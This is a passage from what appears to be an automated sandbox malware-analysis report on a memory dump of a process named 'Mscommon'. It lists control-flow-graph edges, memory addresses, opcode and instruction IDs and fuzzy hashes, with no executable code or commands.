205->213 214 7ffd9c1b71d1 205->214 215 7ffd9c1b7158-7ffd9c1b715c 206->215 226 7ffd9c1b7168-7ffd9c1b7170 207->226 227 7ffd9c1b70e8 207->227 217 7ffd9c1b707e-7ffd9c1b7084 208->217 209->217 218 7ffd9c1b70f9 209->218 239 7ffd9c1b71bd-7ffd9c1b71c6 210->239 240 7ffd9c1b718d-7ffd9c1b719b 210->240 219 7ffd9c1b720c-7ffd9c1b721a 211->219 212->150 213->161 223 7ffd9c1b7251 213->223 214->215 222 7ffd9c1b71d3 214->222 224 7ffd9c1b71d8-7ffd9c1b71de 215->224 225 7ffd9c1b715e 215->225 231 7ffd9c1b7100-7ffd9c1b7125 217->231 238 7ffd9c1b7086 217->238 218->231 232 7ffd9c1b721b-7ffd9c1b7225 219->232 220->158 221 7ffd9c1b7242 220->221 221->196 233 7ffd9c1b7244 221->233 222->224 223->224 234 7ffd9c1b7253 223->234 242 7ffd9c1b725a-7ffd9c1b725d 224->242 243 7ffd9c1b71e0 224->243 225->207 236 7ffd9c1b7160 225->236 226->210 227->185 237 7ffd9c1b70e9-7ffd9c1b70ea 227->237 250 7ffd9c1b7128-7ffd9c1b7139 231->250 241 7ffd9c1b7227-7ffd9c1b723a 232->241 233->213 234->242 236->226 237->202 238->174 244 7ffd9c1b7088 238->244 239->196 240->219 245 7ffd9c1b719d-7ffd9c1b719f 240->245 241->204 242->212 243->241 248 7ffd9c1b71e2-7ffd9c1b71ea 243->248 244->181 245->232 249 7ffd9c1b71a1 245->249 248->203 249->250 252 7ffd9c1b71a3 249->252 250->187 250->195 252->194
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6d73ef9ac4af26b01e57e2dbebd4e0ba87a41649fe65f5a1d4b3270638577a69
                                                                                                                                    • Instruction ID: 7259a9d248622390430a316eae59fc469736e28e16cef0b557d8a84f799cec5a
                                                                                                                                    • Opcode Fuzzy Hash: 6d73ef9ac4af26b01e57e2dbebd4e0ba87a41649fe65f5a1d4b3270638577a69
                                                                                                                                    • Instruction Fuzzy Hash: 0E229531B18A1A8FDBA8DB58C8A5A6873F2FF59310B1041B9D00ED7296DE24EC41CF95

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 253 7ffd9c1c020f-7ffd9c1c0222 254 7ffd9c1c026e-7ffd9c1c0284 253->254 255 7ffd9c1c0224-7ffd9c1c0565 253->255 257 7ffd9c1c028a-7ffd9c1c0292 254->257 258 7ffd9c1c0314-7ffd9c1c0344 254->258 260 7ffd9c1c056f-7ffd9c1c05ae 255->260 259 7ffd9c1c0298-7ffd9c1c02aa 257->259 257->260 267 7ffd9c1c034a-7ffd9c1c034b 258->267 268 7ffd9c1c03ee-7ffd9c1c03f7 258->268 259->260 262 7ffd9c1c02b0-7ffd9c1c02c7 259->262 269 7ffd9c1c05b0 260->269 264 7ffd9c1c0307-7ffd9c1c030e 262->264 265 7ffd9c1c02c9-7ffd9c1c02d0 262->265 264->257 264->258 265->260 270 7ffd9c1c02d6-7ffd9c1c0304 265->270 271 7ffd9c1c034e-7ffd9c1c0364 267->271 272 7ffd9c1c052f-7ffd9c1c053d 268->272 273 7ffd9c1c03fd-7ffd9c1c0403 268->273 275 7ffd9c1c05bb-7ffd9c1c0651 269->275 270->264 271->260 274 7ffd9c1c036a-7ffd9c1c038e 271->274 276 7ffd9c1c053f 272->276 277 7ffd9c1c0544-7ffd9c1c0555 272->277 273->260 278 7ffd9c1c0409-7ffd9c1c0418 273->278 279 7ffd9c1c0390-7ffd9c1c03b3 call 7ffd9c1bc4d8 274->279 280 7ffd9c1c03e1-7ffd9c1c03e8 274->280 288 7ffd9c1c05d6-7ffd9c1c0656 275->288 289 7ffd9c1c065c-7ffd9c1c0b1f 275->289 276->277 282 7ffd9c1c041e-7ffd9c1c0425 278->282 283 7ffd9c1c0522-7ffd9c1c0529 278->283 279->260 291 7ffd9c1c03b9-7ffd9c1c03df 279->291 280->268 280->271 282->260 286 7ffd9c1c042b-7ffd9c1c0437 call 7ffd9c1bc4d8 282->286 283->272 283->273 293 7ffd9c1c043c-7ffd9c1c0447 286->293 288->289 301 7ffd9c1c05f8-7ffd9c1c0658 288->301 291->279 291->280 296 7ffd9c1c0486-7ffd9c1c0495 293->296 297 7ffd9c1c0449-7ffd9c1c0460 293->297 296->260 300 7ffd9c1c049b-7ffd9c1c04bf 296->300 297->260 299 7ffd9c1c0466-7ffd9c1c0482 297->299 299->297 303 7ffd9c1c0484 299->303 304 7ffd9c1c04c2-7ffd9c1c04df 300->304 301->289 311 7ffd9c1c061c-7ffd9c1c065a 301->311 306 7ffd9c1c0502-7ffd9c1c0518 303->306 304->260 308 7ffd9c1c04e5-7ffd9c1c0500 304->308 306->260 310 7ffd9c1c051a-7ffd9c1c051e 306->310 308->304 308->306 310->283 311->289 316 7ffd9c1c063d-7ffd9c1c0650 311->316
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e25d651013d9908eb5c6e61a68a729929bd1536ff0dfdeea7c1867016c10f426
                                                                                                                                    • Instruction ID: fbf1a86d802b122f20a9fa82e9dd9bd769b1605c1ecda7b0a0c5b6058e5f49dd
                                                                                                                                    • Opcode Fuzzy Hash: e25d651013d9908eb5c6e61a68a729929bd1536ff0dfdeea7c1867016c10f426
                                                                                                                                    • Instruction Fuzzy Hash: 6BF1C231A585568FEB58DF58C4E06B477B1FF45310F9041BDE85ACB69ACB38E882CB84

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d23c3ed6e27cac77d33eb50a09bf183ec1fcba0998153159569f7af5c3555326
                                                                                                                                    • Instruction ID: 10e613c802f6edf4bb185c4d314507d9bba9984ea9ecdc4128f2bdef128d6daf
                                                                                                                                    • Opcode Fuzzy Hash: d23c3ed6e27cac77d33eb50a09bf183ec1fcba0998153159569f7af5c3555326
                                                                                                                                    • Instruction Fuzzy Hash: 99B10923E0D6A75FE721ABACD8F10E57FB0EF152A8B0801B7E099DA097DD156405C788

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d9e3b35a0babd0ea0dbe656971e3b7cb5c4497218df3779662a289d16ee86112
                                                                                                                                    • Instruction ID: 1efba6aec26ff411ddfbcce6caba574a4071c70ad852a49c9e9ed4831262c6b7
                                                                                                                                    • Opcode Fuzzy Hash: d9e3b35a0babd0ea0dbe656971e3b7cb5c4497218df3779662a289d16ee86112
                                                                                                                                    • Instruction Fuzzy Hash: 0351F423A0D6578AF33D7BA8A8214F97770AF053A9F1801B7E44D9A0DFCD1C78018B99

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 433 7ffd9c1baa6f-7ffd9c1baa82 434 7ffd9c1baace-7ffd9c1baae4 433->434 435 7ffd9c1baa84-7ffd9c1badc5 433->435 437 7ffd9c1baaea-7ffd9c1baaf2 434->437 438 7ffd9c1bab74-7ffd9c1babc4 434->438 441 7ffd9c1badcf-7ffd9c1bae0e 435->441 440 7ffd9c1baaf8-7ffd9c1bab0a 437->440 437->441 438->441 449 7ffd9c1babca-7ffd9c1babee 438->449 440->441 442 7ffd9c1bab10-7ffd9c1bab27 440->442 452 7ffd9c1bae10 441->452 445 7ffd9c1bab67-7ffd9c1bab6e 442->445 446 7ffd9c1bab29-7ffd9c1bab30 442->446 445->437 445->438 446->441 447 7ffd9c1bab36-7ffd9c1bab64 446->447 447->445 450 7ffd9c1babf0-7ffd9c1bac13 call 7ffd9c1b3718 449->450 451 7ffd9c1bac41-7ffd9c1bac57 449->451 450->441 459 7ffd9c1bac19-7ffd9c1bac3f 450->459 457 7ffd9c1bad8f-7ffd9c1bad9d 451->457 458 7ffd9c1bac5d-7ffd9c1bac63 451->458 456 7ffd9c1bae1b-7ffd9c1baeb1 452->456 468 7ffd9c1bae36-7ffd9c1baeb6 456->468 469 7ffd9c1baebc-7ffd9c1baeff 456->469 460 7ffd9c1bad9f 457->460 461 7ffd9c1bada4-7ffd9c1badb5 457->461 458->441 463 7ffd9c1bac69-7ffd9c1bac78 458->463 459->450 459->451 460->461 465 7ffd9c1bac7e-7ffd9c1bac85 463->465 466 7ffd9c1bad82-7ffd9c1bad89 463->466 465->441 467 7ffd9c1bac8b-7ffd9c1bac97 call 7ffd9c1b3718 465->467 466->457 466->458 472 7ffd9c1bac9c-7ffd9c1baca7 467->472 468->469 475 7ffd9c1bae58-7ffd9c1baeb8 468->475 482 7ffd9c1baf01-7ffd9c1bb007 469->482 476 7ffd9c1bace6-7ffd9c1bacf5 472->476 477 7ffd9c1baca9-7ffd9c1bacc0 472->477 475->469 487 7ffd9c1bae7c-7ffd9c1baeba 475->487 476->441 481 7ffd9c1bacfb-7ffd9c1bad1f 476->481 477->441 480 7ffd9c1bacc6-7ffd9c1bace2 477->480 480->477 483 7ffd9c1bace4 480->483 485 7ffd9c1bad22-7ffd9c1bad3f 481->485 508 7ffd9c1bb137-7ffd9c1bb154 482->508 509 7ffd9c1bb0ec-7ffd9c1bb0fb 482->509 488 7ffd9c1bad62-7ffd9c1bad78 483->488 485->441 489 7ffd9c1bad45-7ffd9c1bad60 485->489 487->469 495 7ffd9c1bae9d-7ffd9c1baeb0 487->495 488->441 491 7ffd9c1bad7a-7ffd9c1bad7e 488->491 489->485 489->488 491->466 511 7ffd9c1bb15a-7ffd9c1bb169 508->511 512 7ffd9c1bb461-7ffd9c1bb4c8 508->512 510 7ffd9c1bb448-7ffd9c1bb459 509->510 510->512 511->509 513 7ffd9c1bb16b-7ffd9c1bb16f 511->513 518 7ffd9c1bb638 512->518 513->482 514 7ffd9c1bb175 513->514 516 7ffd9c1bb1f3-7ffd9c1bb200 514->516 516->510 519 7ffd9c1bb177-7ffd9c1bb192 call 7ffd9c1bae00 516->519 518->518 519->516
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6531d8325ac78d89c5c509c284634b70bcf7d411c57716f107fdb98ad4a16e13
                                                                                                                                    • Instruction ID: f355fad182f63c577dbd10f723acffda166706800a58423c1fe8b4f52c37aa9a
                                                                                                                                    • Opcode Fuzzy Hash: 6531d8325ac78d89c5c509c284634b70bcf7d411c57716f107fdb98ad4a16e13
                                                                                                                                    • Instruction Fuzzy Hash: 63D1C0316186528FEB69CF58C4E05B03BB1FF49311B5445BDD84A8B68FDA38F982CB85

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 521 7ffd9c1baa8f-7ffd9c1baa98 522 7ffd9c1badcf-7ffd9c1bae10 521->522 523 7ffd9c1baa9e-7ffd9c1baaaf 521->523 539 7ffd9c1bae1b-7ffd9c1baeb1 522->539 524 7ffd9c1baac5-7ffd9c1baacc 523->524 525 7ffd9c1baab1-7ffd9c1baab5 523->525 528 7ffd9c1baace-7ffd9c1baae4 524->528 529 7ffd9c1baa84-7ffd9c1badc5 524->529 525->522 527 7ffd9c1baabb-7ffd9c1baac3 525->527 527->524 532 7ffd9c1baaea-7ffd9c1baaf2 528->532 533 7ffd9c1bab74-7ffd9c1babc4 528->533 529->522 532->522 536 7ffd9c1baaf8-7ffd9c1bab0a 532->536 533->522 543 7ffd9c1babca-7ffd9c1babee 533->543 536->522 537 7ffd9c1bab10-7ffd9c1bab27 536->537 540 7ffd9c1bab67-7ffd9c1bab6e 537->540 541 7ffd9c1bab29-7ffd9c1bab30 537->541 550 7ffd9c1bae36-7ffd9c1baeb6 539->550 551 7ffd9c1baebc-7ffd9c1baeff 539->551 540->532 540->533 541->522 542 7ffd9c1bab36-7ffd9c1bab64 541->542 542->540 546 7ffd9c1babf0-7ffd9c1bac13 call 7ffd9c1b3718 543->546 547 7ffd9c1bac41-7ffd9c1bac57 543->547 546->522 558 7ffd9c1bac19-7ffd9c1bac3f 546->558 553 7ffd9c1bad8f-7ffd9c1bad9d 547->553 554 7ffd9c1bac5d-7ffd9c1bac63 547->554 550->551 562 7ffd9c1bae58-7ffd9c1baeb8 550->562 568 7ffd9c1baf01-7ffd9c1bb007 551->568 559 7ffd9c1bad9f 553->559 560 7ffd9c1bada4-7ffd9c1badb5 553->560 554->522 561 7ffd9c1bac69-7ffd9c1bac78 554->561 558->546 558->547 559->560 564 7ffd9c1bac7e-7ffd9c1bac85 561->564 565 7ffd9c1bad82-7ffd9c1bad89 561->565 562->551 573 7ffd9c1bae7c-7ffd9c1baeba 562->573 564->522 566 7ffd9c1bac8b-7ffd9c1bac97 call 7ffd9c1b3718 564->566 565->553 565->554 572 7ffd9c1bac9c-7ffd9c1baca7 566->572 600 7ffd9c1bb137-7ffd9c1bb154 568->600 601 7ffd9c1bb0ec-7ffd9c1bb0fb 568->601 574 7ffd9c1bace6-7ffd9c1bacf5 572->574 575 7ffd9c1baca9-7ffd9c1bacc0 572->575 573->551 582 7ffd9c1bae9d-7ffd9c1baeb0 573->582 574->522 580 7ffd9c1bacfb-7ffd9c1bad1f 574->580 575->522 578 7ffd9c1bacc6-7ffd9c1bace2 575->578 578->575 583 7ffd9c1bace4 578->583 584 7ffd9c1bad22-7ffd9c1bad3f 580->584 586 7ffd9c1bad62-7ffd9c1bad78 583->586 584->522 587 7ffd9c1bad45-7ffd9c1bad60 584->587 586->522 589 7ffd9c1bad7a-7ffd9c1bad7e 586->589 587->584 587->586 589->565 603 7ffd9c1bb15a-7ffd9c1bb169 600->603 604 7ffd9c1bb461-7ffd9c1bb4c8 600->604 602 7ffd9c1bb448-7ffd9c1bb459 601->602 602->604 603->601 605 7ffd9c1bb16b-7ffd9c1bb16f 603->605 610 7ffd9c1bb638 604->610 605->568 606 7ffd9c1bb175 605->606 608 7ffd9c1bb1f3-7ffd9c1bb200 606->608 608->602 611 7ffd9c1bb177-7ffd9c1bb192 call 7ffd9c1bae00 608->611 610->610 611->608
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 35981a1c911518d1f1da9f6d3b2cb67d94c9a8bc31c487da85a09a4d7b0a13cf
                                                                                                                                    • Instruction ID: 1c73c48a52a494b25b1a4df2581ffc1696856f920e27ee474ab95191356e69b7
                                                                                                                                    • Opcode Fuzzy Hash: 35981a1c911518d1f1da9f6d3b2cb67d94c9a8bc31c487da85a09a4d7b0a13cf
                                                                                                                                    • Instruction Fuzzy Hash: 3FC1D0316186428BEB2DCF58C4E05B13BB1FF49341B5445BDD88A8B68FDA38F981CB49

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 613 7ffd9c1c022f-7ffd9c1c0238 614 7ffd9c1c056f-7ffd9c1c05b0 613->614 615 7ffd9c1c023e-7ffd9c1c024f 613->615 628 7ffd9c1c05bb-7ffd9c1c0651 614->628 616 7ffd9c1c0265-7ffd9c1c026c 615->616 617 7ffd9c1c0251-7ffd9c1c0255 615->617 618 7ffd9c1c026e-7ffd9c1c0284 616->618 619 7ffd9c1c0224-7ffd9c1c0565 616->619 617->614 621 7ffd9c1c025b-7ffd9c1c0263 617->621 624 7ffd9c1c028a-7ffd9c1c0292 618->624 625 7ffd9c1c0314-7ffd9c1c0344 618->625 619->614 621->616 624->614 626 7ffd9c1c0298-7ffd9c1c02aa 624->626 634 7ffd9c1c034a-7ffd9c1c034b 625->634 635 7ffd9c1c03ee-7ffd9c1c03f7 625->635 626->614 629 7ffd9c1c02b0-7ffd9c1c02c7 626->629 641 7ffd9c1c05d6-7ffd9c1c0656 628->641 642 7ffd9c1c065c-7ffd9c1c0b1f 628->642 631 7ffd9c1c0307-7ffd9c1c030e 629->631 632 7ffd9c1c02c9-7ffd9c1c02d0 629->632 631->624 631->625 632->614 637 7ffd9c1c02d6-7ffd9c1c0304 632->637 638 7ffd9c1c034e-7ffd9c1c0364 634->638 639 7ffd9c1c052f-7ffd9c1c053d 635->639 640 7ffd9c1c03fd-7ffd9c1c0403 635->640 637->631 638->614 643 7ffd9c1c036a-7ffd9c1c038e 638->643 644 7ffd9c1c053f 639->644 645 7ffd9c1c0544-7ffd9c1c0555 639->645 640->614 646 7ffd9c1c0409-7ffd9c1c0418 640->646 641->642 656 7ffd9c1c05f8-7ffd9c1c0658 641->656 648 7ffd9c1c0390-7ffd9c1c03b3 call 7ffd9c1bc4d8 643->648 649 7ffd9c1c03e1-7ffd9c1c03e8 643->649 644->645 651 7ffd9c1c041e-7ffd9c1c0425 646->651 652 7ffd9c1c0522-7ffd9c1c0529 646->652 648->614 663 7ffd9c1c03b9-7ffd9c1c03df 648->663 649->635 649->638 651->614 657 7ffd9c1c042b-7ffd9c1c0437 call 7ffd9c1bc4d8 651->657 652->639 652->640 656->642 666 7ffd9c1c061c-7ffd9c1c065a 656->666 664 7ffd9c1c043c-7ffd9c1c0447 657->664 663->648 663->649 667 7ffd9c1c0486-7ffd9c1c0495 664->667 668 7ffd9c1c0449-7ffd9c1c0460 664->668 666->642 677 7ffd9c1c063d-7ffd9c1c0650 666->677 667->614 670 7ffd9c1c049b-7ffd9c1c04bf 667->670 668->614 669 7ffd9c1c0466-7ffd9c1c0482 668->669 669->668 673 7ffd9c1c0484 669->673 674 7ffd9c1c04c2-7ffd9c1c04df 670->674 678 7ffd9c1c0502-7ffd9c1c0518 673->678 674->614 679 7ffd9c1c04e5-7ffd9c1c0500 674->679 678->614 680 7ffd9c1c051a-7ffd9c1c051e 678->680 679->674 679->678 680->652
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b5c85fbf99c39398a6a4dbe736711dc21e01f1c4640148b6c237b748f78e8779
                                                                                                                                    • Instruction ID: 791c76853789790a7124012489f1e4c42b2874e2e87ef21f442f7c06b4793496
                                                                                                                                    • Opcode Fuzzy Hash: b5c85fbf99c39398a6a4dbe736711dc21e01f1c4640148b6c237b748f78e8779
                                                                                                                                    • Instruction Fuzzy Hash: 3BC1DD31A585168FEB29DF44C4E05B537B1FF45350B9046BDE85B8B69BCB38E882CB84

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 682 7ffd9c1ba322-7ffd9c1ba329 683 7ffd9c1ba545-7ffd9c1ba556 682->683 684 7ffd9c1ba32f-7ffd9c1ba361 call 7ffd9c1ba0c0 call 7ffd9c1b9f90 682->684 686 7ffd9c1ba558 683->686 687 7ffd9c1ba55d-7ffd9c1ba568 683->687 684->683 691 7ffd9c1ba367-7ffd9c1ba3b9 call 7ffd9c1ba0c0 call 7ffd9c1b9f90 684->691 686->687 691->683 697 7ffd9c1ba3bf-7ffd9c1ba404 call 7ffd9c1ba0c0 691->697 703 7ffd9c1ba406-7ffd9c1ba41a call 7ffd9c1b9f90 697->703 704 7ffd9c1ba474-7ffd9c1ba4b0 call 7ffd9c1b5910 697->704 703->683 709 7ffd9c1ba420-7ffd9c1ba443 call 7ffd9c1ba0c0 703->709 714 7ffd9c1ba4e9-7ffd9c1ba4f0 call 7ffd9c1b49c8 704->714 715 7ffd9c1ba615-7ffd9c1ba62c 709->715 716 7ffd9c1ba449-7ffd9c1ba459 709->716 720 7ffd9c1ba4f5-7ffd9c1ba4fa 714->720 721 7ffd9c1ba62f-7ffd9c1ba63d 715->721 722 7ffd9c1ba62e 715->722 716->715 718 7ffd9c1ba45f-7ffd9c1ba472 716->718 718->703 718->704 723 7ffd9c1ba4fc-7ffd9c1ba4fe 720->723 724 7ffd9c1ba4b2-7ffd9c1ba4d2 720->724 726 7ffd9c1ba645 721->726 727 7ffd9c1ba63f 721->727 722->721 723->683 728 7ffd9c1ba500-7ffd9c1ba503 723->728 724->715 725 7ffd9c1ba4d8-7ffd9c1ba4e3 724->725 725->714 729 7ffd9c1ba5cb-7ffd9c1ba5df 725->729 730 7ffd9c1ba647 726->730 731 7ffd9c1ba649-7ffd9c1ba688 726->731 727->726 732 7ffd9c1ba505 728->732 733 7ffd9c1ba509-7ffd9c1ba524 728->733 736 7ffd9c1ba5e6-7ffd9c1ba5f1 729->736 737 7ffd9c1ba5e1 729->737 730->731 734 7ffd9c1ba689 730->734 731->734 739 7ffd9c1ba68a-7ffd9c1ba8ca 731->739 732->733 733->715 738 7ffd9c1ba52a-7ffd9c1ba543 call 7ffd9c1b9f90 733->738 734->739 737->736 738->683 743 7ffd9c1ba569-7ffd9c1ba582 call 7ffd9c1ba0c0 738->743 743->715 747 7ffd9c1ba588-7ffd9c1ba58f 743->747 748 7ffd9c1ba5b9-7ffd9c1ba5c1 747->748 749 7ffd9c1ba5c3-7ffd9c1ba5c9 748->749 750 7ffd9c1ba591-7ffd9c1ba5ad 748->750 749->729 752 7ffd9c1ba5f2 749->752 750->715 751 7ffd9c1ba5af-7ffd9c1ba5b7 750->751 751->748 752->715
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e7e00a4c0441b2faa8aba9a5fed047b23618f2886f711af117fbf764ea58e29f
                                                                                                                                    • Instruction ID: de14a0c1796c0ef6157323dbf0070a462578fbb27a1a8e38548ca105d32175e2
                                                                                                                                    • Opcode Fuzzy Hash: e7e00a4c0441b2faa8aba9a5fed047b23618f2886f711af117fbf764ea58e29f
                                                                                                                                    • Instruction Fuzzy Hash: 26C1C171B0CA479FE759DF68C4A06A4BBB1FF49340F5441B9D04EC7A8ACB28B951CB84

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 753 7ffd9c1b7ad7-7ffd9c1b7aee 755 7ffd9c1b7af0 753->755 756 7ffd9c1b7af3-7ffd9c1b7cfb 753->756 755->756 762 7ffd9c1b7d06-7ffd9c1b7d98 756->762 777 7ffd9c1b7d6a-7ffd9c1b7d79 call 7ffd9c1b7d9a 762->777 778 7ffd9c1b7d40-7ffd9c1b7d69 762->778 778->777
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 59ea9d38fdf945a9f9675dfdc6a947ac9c15c6eb0e0fdc1d940cd663dfcef45e
                                                                                                                                    • Instruction ID: f990393ab026e591f65ec5e366d653c7345b01e5e99395b5b2b6ec020222417e
                                                                                                                                    • Opcode Fuzzy Hash: 59ea9d38fdf945a9f9675dfdc6a947ac9c15c6eb0e0fdc1d940cd663dfcef45e
                                                                                                                                    • Instruction Fuzzy Hash: 9731C332B0C54B8FE778AB9894715F877F0EF14395F5404BAE00ED61CACD2968408B99
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ec5108e79fc146705c72f7c272be0d115054b0c4b7ab815ab85e0bb5b8bf341f
                                                                                                                                    • Instruction ID: a3d9c7cc072dfe705170123efdcf5e646d70ae3fc9d18f79b6fa8df0868feaca
                                                                                                                                    • Opcode Fuzzy Hash: ec5108e79fc146705c72f7c272be0d115054b0c4b7ab815ab85e0bb5b8bf341f
                                                                                                                                    • Instruction Fuzzy Hash: 78A1C732B0DA8A4FEBA5DB68C4746B87BF1FF85740F4900BBD04DD7296CE28A8058705
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bdea13ce046dd66815023e6ebf039318660350100f39e578879f5610af89e5e9
                                                                                                                                    • Instruction ID: 73a4454bd3fabf7b4fd30497cdd2bb04b16b356026381b024a5c53f30f5e8cfb
                                                                                                                                    • Opcode Fuzzy Hash: bdea13ce046dd66815023e6ebf039318660350100f39e578879f5610af89e5e9
                                                                                                                                    • Instruction Fuzzy Hash: 38B10735A0CA475FE759DF68C0A06A0B7B1FF05340F5441B9D44EC7A8BDB28B851CB84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 818ef56f34e034c5b3e91aa2a3a56fe33747458184aee66c0c17c8ca0fe91edc
                                                                                                                                    • Instruction ID: 0e0287a2254a9df7ca9fe2550b6682d9f03b9a947fd6e9c5d3b3a7048c6c1807
                                                                                                                                    • Opcode Fuzzy Hash: 818ef56f34e034c5b3e91aa2a3a56fe33747458184aee66c0c17c8ca0fe91edc
                                                                                                                                    • Instruction Fuzzy Hash: FA11E043F0E1C38AF23DB2B408301B899A12F517A4F1802BAD49EAA5CEDC0C3C411A8A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
